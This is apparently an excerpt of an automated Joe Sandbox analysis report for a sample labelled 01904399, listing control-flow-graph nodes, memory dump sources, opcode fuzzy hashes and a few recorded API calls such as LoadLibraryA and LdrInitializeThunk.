                                                                            • Instruction ID: 90c3b9c15ee471f46b08075f4ce8411f9443567671aaeb3d88f48a72d3dbf5bb
                                                                            • Opcode Fuzzy Hash: 93fa61179ffd6bca3557000191e20a359f2c5d37635edd57a13dadb775121437
                                                                            • Instruction Fuzzy Hash: 6F227F70A0060ADFC714DF69D955B9DBBF2FF89314F14896DD00A9B261CB38AC46EB90
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 1695 fcafd0-fcb075 1697 fcb077-fcb09e 1695->1697 1698 fcb0f1-fcb0ff 1695->1698 1697->1698 1702 fcb0a0-fcb0b4 1697->1702 1699 fcb102-fcb12e 1698->1699 1703 fcb1a7-fcb1b5 1699->1703 1704 fcb130-fcb157 1699->1704 1707 fcb0b6-fcb0c0 1702->1707 1708 fcb0d7-fcb0ef 1702->1708 1705 fcb1b8-fcb1ec 1703->1705 1704->1703 1713 fcb159-fcb16d 1704->1713 1715 fcb1ee-fcb215 1705->1715 1716 fcb265-fcb273 1705->1716 1710 fcb0c4-fcb0d3 1707->1710 1711 fcb0c2 1707->1711 1708->1699 1710->1710 1714 fcb0d5 1710->1714 1711->1710 1720 fcb16f-fcb179 1713->1720 1721 fcb190-fcb1a5 1713->1721 1714->1708 1715->1716 1725 fcb217-fcb22b 1715->1725 1717 fcb276-fcb2aa 1716->1717 1727 fcb2ac-fcb2d3 1717->1727 1728 fcb323-fcb331 1717->1728 1722 fcb17d-fcb18c 1720->1722 1723 fcb17b 1720->1723 1721->1705 1722->1722 1726 fcb18e 1722->1726 1723->1722 1732 fcb22d-fcb237 1725->1732 1733 fcb24e-fcb263 1725->1733 1726->1721 1727->1728 1735 fcb2d5-fcb2e9 1727->1735 1729 fcb334-fcb417 1728->1729 1750 fcb419-fcb41f 1729->1750 1751 fcb420-fcb493 1729->1751 1736 fcb239 1732->1736 1737 fcb23b-fcb24a 1732->1737 1733->1717 1741 fcb30c-fcb321 1735->1741 1742 fcb2eb-fcb2f5 1735->1742 1736->1737 1737->1737 1738 fcb24c 1737->1738 1738->1733 1741->1729 1744 fcb2f9-fcb308 1742->1744 1745 fcb2f7 1742->1745 1744->1744 1746 fcb30a 1744->1746 1745->1744 1746->1741 1750->1751 1757 fcb49b-fcb4e4 1751->1757 1760 fcb4f4-fcb4f8 1757->1760 1761 fcb4e6-fcb4ea 1757->1761 1763 fcb508-fcb50c 1760->1763 1764 fcb4fa-fcb4fe 1760->1764 1761->1760 1762 fcb4ec 1761->1762 1762->1760 1766 fcb51c-fcb520 1763->1766 1767 fcb50e-fcb512 1763->1767 1764->1763 1765 fcb500 1764->1765 1765->1763 1769 fcb530-fcb534 1766->1769 1770 fcb522-fcb526 1766->1770 1767->1766 1768 fcb514 1767->1768 1768->1766 1772 fcb544-fcb548 1769->1772 1773 fcb536-fcb53a 1769->1773 1770->1769 1771 fcb528 1770->1771 1771->1769 1775 fcb558 1772->1775 1776 fcb54a-fcb54e 1772->1776 1773->1772 1774 fcb53c 1773->1774 1774->1772 1778 fcb559 1775->1778 1776->1775 1777 fcb550 1776->1777 1777->1775 1778->1778
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.605777355.0000000000FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_fc0000_01904399.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 6dce663378fbf4b7dfc0581d923fdbc792e42222b8937a0e0f30a4bcab8d42ab
                                                                            • Instruction ID: 40ba4f55ff9a180d54ed226c3c0bdae30be440decdf6b800d1aff611c3b4512a
                                                                            • Opcode Fuzzy Hash: 6dce663378fbf4b7dfc0581d923fdbc792e42222b8937a0e0f30a4bcab8d42ab
                                                                            • Instruction Fuzzy Hash: 66F1D4B4D00229CFDB24CFA9C982BDDBBB1BF48310F1485AAD409B7294DB349A85DF55
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.605777355.0000000000FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_fc0000_01904399.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: e6154cb397214b73b8d0c95c6963f1848969d950f5ff3261b1604ab084c30163
                                                                            • Instruction ID: aced7856e59b04a1a212fa774d0713d893330553398e224cfd4b1b964083d89c
                                                                            • Opcode Fuzzy Hash: e6154cb397214b73b8d0c95c6963f1848969d950f5ff3261b1604ab084c30163
                                                                            • Instruction Fuzzy Hash: 6241DBB4D042589FDB14CFAAD985AEEBFF5AF48310F24802AE418BB254D7349986CF40
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.605777355.0000000000FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_fc0000_01904399.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 2e70106b0398917d5ee3ef0ad2449ace24870b65ea0349988b0e16b441f65566
                                                                            • Instruction ID: cf482e501fd3b3d962826f2c920728c9d51e23838b790fd657414663497e115e
                                                                            • Opcode Fuzzy Hash: 2e70106b0398917d5ee3ef0ad2449ace24870b65ea0349988b0e16b441f65566
                                                                            • Instruction Fuzzy Hash: 2141C9B4D002189FDB14CFAAD985ADEFBF5AF48310F24802AE418BB254D734A985CF54
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.605777355.0000000000FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_fc0000_01904399.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: bb4cb6faa53d22b40a1096a070a787eaea557742428fce7a1e52bdda49794428
                                                                            • Instruction ID: 3ea0d57dd542aef0fb1aaf383510646a2f7cd8721730c136595ffc28987d08df
                                                                            • Opcode Fuzzy Hash: bb4cb6faa53d22b40a1096a070a787eaea557742428fce7a1e52bdda49794428
                                                                            • Instruction Fuzzy Hash: 794134B4D012589FDB50CFA8D598BDDBBF0BB08314F20412AE818BB394D7B99949CF54
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 106 fc6374-fc63db 107 fc63dd-fc640a 106->107 108 fc643a-fc6491 LoadLibraryA 106->108 107->108 118 fc640c-fc6411 107->118 111 fc649a-fc64dd 108->111 112 fc6493-fc6499 108->112 116 fc64ed 111->116 117 fc64df-fc64e3 111->117 112->111 124 fc64ee 116->124 117->116 119 fc64e5 117->119 120 fc6434-fc6437 118->120 121 fc6413-fc641d 118->121 119->116 120->108 122 fc641f 121->122 123 fc6421-fc6430 121->123 122->123 123->123 125 fc6432 123->125 124->124 125->120
                                                                            APIs
                                                                            • LoadLibraryA.KERNELBASE(?), ref: 00FC6481
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.605777355.0000000000FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_fc0000_01904399.jbxd
                                                                            Similarity
                                                                            • API ID: LibraryLoad
                                                                            • String ID:
                                                                            • API String ID: 1029625771-0
                                                                            • Opcode ID: 7671dda9f6f9f9ac83b3c0b78df39759890a9e3bd94835a76f799514f462bb42
                                                                            • Instruction ID: 5cd331d27f7e7ed4b42f42f95b06566654411a1f417734d267892a8467785bda
                                                                            • Opcode Fuzzy Hash: 7671dda9f6f9f9ac83b3c0b78df39759890a9e3bd94835a76f799514f462bb42
                                                                            • Instruction Fuzzy Hash: 244100B4D042199FDB14CFA9D985BDDBBB2FB48314F14912AE814AB380D774A845DF50
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 126 fc3690-fc63db 128 fc63dd-fc640a 126->128 129 fc643a-fc6491 LoadLibraryA 126->129 128->129 139 fc640c-fc6411 128->139 132 fc649a-fc64dd 129->132 133 fc6493-fc6499 129->133 137 fc64ed 132->137 138 fc64df-fc64e3 132->138 133->132 145 fc64ee 137->145 138->137 140 fc64e5 138->140 141 fc6434-fc6437 139->141 142 fc6413-fc641d 139->142 140->137 141->129 143 fc641f 142->143 144 fc6421-fc6430 142->144 143->144 144->144 146 fc6432 144->146 145->145 146->141
                                                                            APIs
                                                                            • LoadLibraryA.KERNELBASE(?), ref: 00FC6481
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.605777355.0000000000FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_fc0000_01904399.jbxd
                                                                            Similarity
                                                                            • API ID: LibraryLoad
                                                                            • String ID:
                                                                            • API String ID: 1029625771-0
                                                                            • Opcode ID: 56f317228e695fb358d2df66756d21b9f6e08ffbbd041e1a343299657a926aba
                                                                            • Instruction ID: 0877c4fed7abb43562806a33ff5a9e2ca7fd9ff05105a0eba9c36612ea722727
                                                                            • Opcode Fuzzy Hash: 56f317228e695fb358d2df66756d21b9f6e08ffbbd041e1a343299657a926aba
                                                                            • Instruction Fuzzy Hash: 364100B0D042199FDB18CFA9D985B9DBBF1FB48314F10912AE814EB341D7B8A845DF90
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.605777355.0000000000FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_fc0000_01904399.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 3594d0baf27e413c31ec6af3a04638e4776f2d7f49a5ccea8e334dd027285ae5
                                                                            • Instruction ID: 7f7011d69376ca1b552a4f86da61988f55c1c9d2dba6ca8234bab60b63547fb7
                                                                            • Opcode Fuzzy Hash: 3594d0baf27e413c31ec6af3a04638e4776f2d7f49a5ccea8e334dd027285ae5
                                                                            • Instruction Fuzzy Hash: 3C02BF70D0022DCBDB24CFA8C981BDDBBB1BF48314F1485AAD409B7294EB74AA85DF55
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.605777355.0000000000FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_fc0000_01904399.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 3a6f62c6d74904c3f6b0a117519e3c334173551174c68450bbeb9ee2f7cc7b78
                                                                            • Instruction ID: 03515d8a8bc1b26b71c1728c54e69b080d789e91a564966a663fb21b66108b7a
                                                                            • Opcode Fuzzy Hash: 3a6f62c6d74904c3f6b0a117519e3c334173551174c68450bbeb9ee2f7cc7b78
                                                                            • Instruction Fuzzy Hash: CFE1E1B0D04219CFDB64CFA8C985BDDBBB1BF48314F1081AAD409B7290DB74AA85DF95
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.605777355.0000000000FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_fc0000_01904399.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: abf700afd625adebec569cad0bdc2ea12499c527e397aca56728273386043df1
                                                                            • Instruction ID: b5e408e51e5de53547e0a4c1cb44b7d5bc15bd40661f6ceffb9f0b5463778c0f
                                                                            • Opcode Fuzzy Hash: abf700afd625adebec569cad0bdc2ea12499c527e397aca56728273386043df1
                                                                            • Instruction Fuzzy Hash: E0410EB0D042099FDB10CFA9DA85BAEBBB1BF09310F24912EE814AB344D7749889DF40
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.605777355.0000000000FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_fc0000_01904399.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: ab0c543d1e601f3ff4d435900b09eb8b166b7209cf3dcafeae9c9d44af531822
                                                                            • Instruction ID: b98259526f2f55494056bddac2ed0b1dddbda3ba8c7d3df6c08a00c7edb11ebc
                                                                            • Opcode Fuzzy Hash: ab0c543d1e601f3ff4d435900b09eb8b166b7209cf3dcafeae9c9d44af531822
                                                                            • Instruction Fuzzy Hash: C24100B4D042099FDB10CFA9DA85BADBBF1BB09310F24952EE814FB244D774A889DF44
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.605777355.0000000000FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_fc0000_01904399.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 214c1933638c5e900140fee0a5806733e8548dcc609180ef2762e75c17afcc9f
                                                                            • Instruction ID: 0cdea7ceed7a73c1993987be66447c7e8d3fb85fa5f578a0aeecd983673abb34
                                                                            • Opcode Fuzzy Hash: 214c1933638c5e900140fee0a5806733e8548dcc609180ef2762e75c17afcc9f
                                                                            • Instruction Fuzzy Hash: 3041CBB4D002189FDB14CFEAD690AEEBBF5AF49300F20902AE408BB254D734A945CF54
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.605777355.0000000000FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_fc0000_01904399.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 69652dae16f6edf727d2f38c0f971ad6e6add131a7b1d6e0b4f34380636aff36
                                                                            • Instruction ID: 247e9e9eba235a5e985c33fd515a89c246b78fb5cf07e26628b61c5e428816a4
                                                                            • Opcode Fuzzy Hash: 69652dae16f6edf727d2f38c0f971ad6e6add131a7b1d6e0b4f34380636aff36
                                                                            • Instruction Fuzzy Hash: CE31DBB9D04258DFCB00CFA9D484AEEFBF0AB49310F24905AE454B7310D778A94ACF64
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.605777355.0000000000FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_fc0000_01904399.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 7aed1eb552d8d4e89a3adb636c3406eeecba3d82de875bcb0bd0c2f619e0dab9
                                                                            • Instruction ID: aa1f875098abb848a9bb3461b601234d2a6aefc395e2af7ee8c2e0570465a962
                                                                            • Opcode Fuzzy Hash: 7aed1eb552d8d4e89a3adb636c3406eeecba3d82de875bcb0bd0c2f619e0dab9
                                                                            • Instruction Fuzzy Hash: 5531DDB5D04258DFCB00CFA9D584AEEFBF4AB09310F24906AE414B7310D778A989CF64
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.605777355.0000000000FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_fc0000_01904399.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 07294c87e5b817f8824667a9e348755b51b6bdc35aead193ea35e1019c028ef0
                                                                            • Instruction ID: ef18231bcb3798c4e47fb0ed4b8ddd5192a7a70be0e606b181dab769576b6513
                                                                            • Opcode Fuzzy Hash: 07294c87e5b817f8824667a9e348755b51b6bdc35aead193ea35e1019c028ef0
                                                                            • Instruction Fuzzy Hash: 2531CDB5D04258DFCB00CFA9D584AEEFBF4AB49310F14906AE414B7310D778A945CF64
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.605777355.0000000000FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_fc0000_01904399.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: ebb229d42c95e2192b544067af2518449788558dcf3bfa23d3f417c088630cf8
                                                                            • Instruction ID: ed87e587d033001eeed9c3b4b383fde6e11d1fc5090c44550b5edd5aee31cbf9
                                                                            • Opcode Fuzzy Hash: ebb229d42c95e2192b544067af2518449788558dcf3bfa23d3f417c088630cf8
                                                                            • Instruction Fuzzy Hash: 5D31BBB5D002189FDB14CFEADA80AEEFBF5AF49300F20902AE408BB254D734A945CF54
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Execution Graph

                                                                            Execution Coverage:16.2%
                                                                            Dynamic/Decrypted Code Coverage:100%
                                                                            Signature Coverage:0%
                                                                            Total number of Nodes:16
                                                                            Total number of Limit Nodes:0
                                                                            execution_graph 8770 1474150 8771 147416e 8770->8771 8774 14732c4 8771->8774 8773 14741a5 8777 1475c70 LoadLibraryA 8774->8777 8776 1475d83 8777->8776 8778 147224b 8782 1472720 8778->8782 8786 147270f 8778->8786 8779 1472251 8783 1472742 8782->8783 8784 14727b3 LdrInitializeThunk 8783->8784 8785 14727d1 8784->8785 8785->8779 8789 1472720 8786->8789 8787 14727b3 LdrInitializeThunk 8788 14727d1 8787->8788 8788->8779 8789->8787

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 0 1472720-1472740 1 1472747-147278d 0->1 2 1472742 0->2 39 1472790 call 14703a7 1->39 40 1472790 call 1470390 1->40 41 1472790 call 14729db 1->41 42 1472790 call 14729e8 1->42 2->1 3 1472796-14727aa 43 14727ad call 147eee0 3->43 44 14727ad call 147eef0 3->44 5 14727b3-14727cf LdrInitializeThunk 6 14727d6-147281d 5->6 7 14727d1 5->7 10 14729a6-14729af 6->10 7->6 11 14729b5-14729c6 10->11 12 1472822-147282b 10->12 14 1472832-147285a 12->14 15 147282d 12->15 17 1472861-1472884 14->17 18 147285c 14->18 15->14 20 1472886 17->20 21 147288b-14728a2 17->21 18->17 20->21 23 14728a4-14728ae 21->23 24 14728b0-14728b6 21->24 25 14728b9-14728c6 23->25 24->25 26 14728cd-14728da 25->26 27 14728c8 25->27 28 14728e1-14729a3 26->28 29 14728dc 26->29 27->26 28->10 29->28 39->3 40->3 41->3 42->3 43->5 44->5
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.656724338.0000000001470000.00000040.00000800.00020000.00000000.sdmp, Offset: 01470000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_1470000_01904399.jbxd
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: f3727b0396a2e3d344e2d9b1df3df87250be6a7cc8a9c683b720f703fb90a991
                                                                            • Instruction ID: 33b273416cc796869a81b391c36f4f6e508b98509911eba19bc07c55f588c137
                                                                            • Opcode Fuzzy Hash: f3727b0396a2e3d344e2d9b1df3df87250be6a7cc8a9c683b720f703fb90a991
                                                                            • Instruction Fuzzy Hash: CA81B274E00219DFDB14DFAAD980A9DFBB2BF88700F14C16AD948AB315DB309842CF54
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 122 147270f-1472740 124 1472747-147278d 122->124 125 1472742 122->125 162 1472790 call 14703a7 124->162 163 1472790 call 1470390 124->163 164 1472790 call 14729db 124->164 165 1472790 call 14729e8 124->165 125->124 126 1472796-14727aa 166 14727ad call 147eee0 126->166 167 14727ad call 147eef0 126->167 128 14727b3-14727cf LdrInitializeThunk 129 14727d6-147281d 128->129 130 14727d1 128->130 133 14729a6-14729af 129->133 130->129 134 14729b5-14729c6 133->134 135 1472822-147282b 133->135 137 1472832-147285a 135->137 138 147282d 135->138 140 1472861-1472884 137->140 141 147285c 137->141 138->137 143 1472886 140->143 144 147288b-14728a2 140->144 141->140 143->144 146 14728a4-14728ae 144->146 147 14728b0-14728b6 144->147 148 14728b9-14728c6 146->148 147->148 149 14728cd-14728da 148->149 150 14728c8 148->150 151 14728e1-14729a3 149->151 152 14728dc 149->152 150->149 151->133 152->151 162->126 163->126 164->126 165->126 166->128 167->128
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.656724338.0000000001470000.00000040.00000800.00020000.00000000.sdmp, Offset: 01470000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_1470000_01904399.jbxd
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: 8c53e24c6ad2b6cb25469a27fb4899cd77cdf1588bc7dac24010cf2fdf214c9d
                                                                            • Instruction ID: a8b7fe20e76b063319741e9cff58568f0396b473637e42ce4b1c3d3248ec79b8
                                                                            • Opcode Fuzzy Hash: 8c53e24c6ad2b6cb25469a27fb4899cd77cdf1588bc7dac24010cf2fdf214c9d
                                                                            • Instruction Fuzzy Hash: C2419374E016089FDB18DFAAD98499DFBF6BF88300F14C12AD918AB328DB345946CF51
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 45 14732e0-14732e9 47 14732c3-1475ccb 45->47 48 14732eb-14732ed 45->48 52 1475ccd-1475cfa 47->52 53 1475d2a-1475d81 LoadLibraryA 47->53 50 14732ef-14732f6 48->50 51 14732f8-1473308 48->51 50->51 57 1473322-1473332 51->57 58 147330a-147330e 51->58 52->53 70 1475cfc-1475d01 52->70 59 1475d83-1475d89 53->59 60 1475d8a-1475dcd 53->60 61 1473339-147333d 57->61 62 1473334 call 14730a8 57->62 58->57 63 1473310-1473312 58->63 59->60 68 1475dcf-1475dd3 60->68 69 1475ddd 60->69 62->61 78 1473314 call 1473350 63->78 79 1473314 call 1473388 63->79 66 147331a 66->57 68->69 71 1475dd5 68->71 76 1475dde 69->76 72 1475d24-1475d27 70->72 73 1475d03-1475d0d 70->73 71->69 72->53 74 1475d11-1475d20 73->74 75 1475d0f 73->75 74->74 77 1475d22 74->77 75->74 76->76 77->72 78->66 79->66
                                                                            APIs
                                                                            • LoadLibraryA.KERNELBASE(?), ref: 01475D71
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.656724338.0000000001470000.00000040.00000800.00020000.00000000.sdmp, Offset: 01470000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_1470000_01904399.jbxd
                                                                            Similarity
                                                                            • API ID: LibraryLoad
                                                                            • String ID:
                                                                            • API String ID: 1029625771-0
                                                                            • Opcode ID: 0e35687e8e703becf9b137b2329a4479a7e7191c3291f1d27119c060b76ef7b8
                                                                            • Instruction ID: d0df9053027bc97a961b35be1c796301f699b95476356d7ec27b09bd3728ee55
                                                                            • Opcode Fuzzy Hash: 0e35687e8e703becf9b137b2329a4479a7e7191c3291f1d27119c060b76ef7b8
                                                                            • Instruction Fuzzy Hash: C05146B0E006089FDB24CFA9D944BDEBBF1FB99310F14852AD405AB360DBB49846CB50
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 80 1475c64-1475ccb 82 1475ccd-1475cfa 80->82 83 1475d2a-1475d81 LoadLibraryA 80->83 82->83 93 1475cfc-1475d01 82->93 86 1475d83-1475d89 83->86 87 1475d8a-1475dcd 83->87 86->87 91 1475dcf-1475dd3 87->91 92 1475ddd 87->92 91->92 94 1475dd5 91->94 99 1475dde 92->99 95 1475d24-1475d27 93->95 96 1475d03-1475d0d 93->96 94->92 95->83 97 1475d11-1475d20 96->97 98 1475d0f 96->98 97->97 100 1475d22 97->100 98->97 99->99 100->95
                                                                            APIs
                                                                            • LoadLibraryA.KERNELBASE(?), ref: 01475D71
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.656724338.0000000001470000.00000040.00000800.00020000.00000000.sdmp, Offset: 01470000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_1470000_01904399.jbxd
                                                                            Similarity
                                                                            • API ID: LibraryLoad
                                                                            • String ID:
                                                                            • API String ID: 1029625771-0
                                                                            • Opcode ID: 1e0acaf5a0090409ff688268dbbcbebb3d7a3bb6198e5ce64f63c53470b878ac
                                                                            • Instruction ID: 312f5b3ca8e4ea6bc9aeec6dbe11de2a2f208d3922c188fc81b28c88d4664719
                                                                            • Opcode Fuzzy Hash: 1e0acaf5a0090409ff688268dbbcbebb3d7a3bb6198e5ce64f63c53470b878ac
                                                                            • Instruction Fuzzy Hash: 0641F3B4D002589FDB14CFA9D988BDEBBF1FB49314F20912AE814AB350D7B49846CF54
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 101 14732c4-1475ccb 103 1475ccd-1475cfa 101->103 104 1475d2a-1475d81 LoadLibraryA 101->104 103->104 114 1475cfc-1475d01 103->114 107 1475d83-1475d89 104->107 108 1475d8a-1475dcd 104->108 107->108 112 1475dcf-1475dd3 108->112 113 1475ddd 108->113 112->113 115 1475dd5 112->115 120 1475dde 113->120 116 1475d24-1475d27 114->116 117 1475d03-1475d0d 114->117 115->113 116->104 118 1475d11-1475d20 117->118 119 1475d0f 117->119 118->118 121 1475d22 118->121 119->118 120->120 121->116
                                                                            APIs
                                                                            • LoadLibraryA.KERNELBASE(?), ref: 01475D71
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.656724338.0000000001470000.00000040.00000800.00020000.00000000.sdmp, Offset: 01470000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_1470000_01904399.jbxd
                                                                            Similarity
                                                                            • API ID: LibraryLoad
                                                                            • String ID:
                                                                            • API String ID: 1029625771-0
                                                                            • Opcode ID: 074447899468b923320af7e8fdc1e0936306be934eb1846b1ca8af7d2fdd21a6
                                                                            • Instruction ID: c8641f0c57e50b81272685658e720d9c7dee3c5ea842b53afa8f5f1cbae02cd2
                                                                            • Opcode Fuzzy Hash: 074447899468b923320af7e8fdc1e0936306be934eb1846b1ca8af7d2fdd21a6
                                                                            • Instruction Fuzzy Hash: AD41F4B4D002189FDB14CFA9D988BDEBBF1FB59314F10912AE814AB350D7B4A846CF84
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Execution Graph

                                                                            Execution Coverage:15.6%
                                                                            Dynamic/Decrypted Code Coverage:100%
                                                                            Signature Coverage:0%
                                                                            Total number of Nodes:13
                                                                            Total number of Limit Nodes:0
                                                                            execution_graph 8551 f54150 8552 f5416e 8551->8552 8555 f532c4 8552->8555 8554 f541a5 8558 f55c70 8555->8558 8556 f55d3a LoadLibraryA 8557 f55d83 8556->8557 8558->8556 8558->8558 8559 f52560 8560 f52582 8559->8560 8561 f525f3 LdrInitializeThunk 8560->8561 8562 f52611 8561->8562 8563 f5208b KiUserExceptionDispatcher 8564 f520ab 8563->8564

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
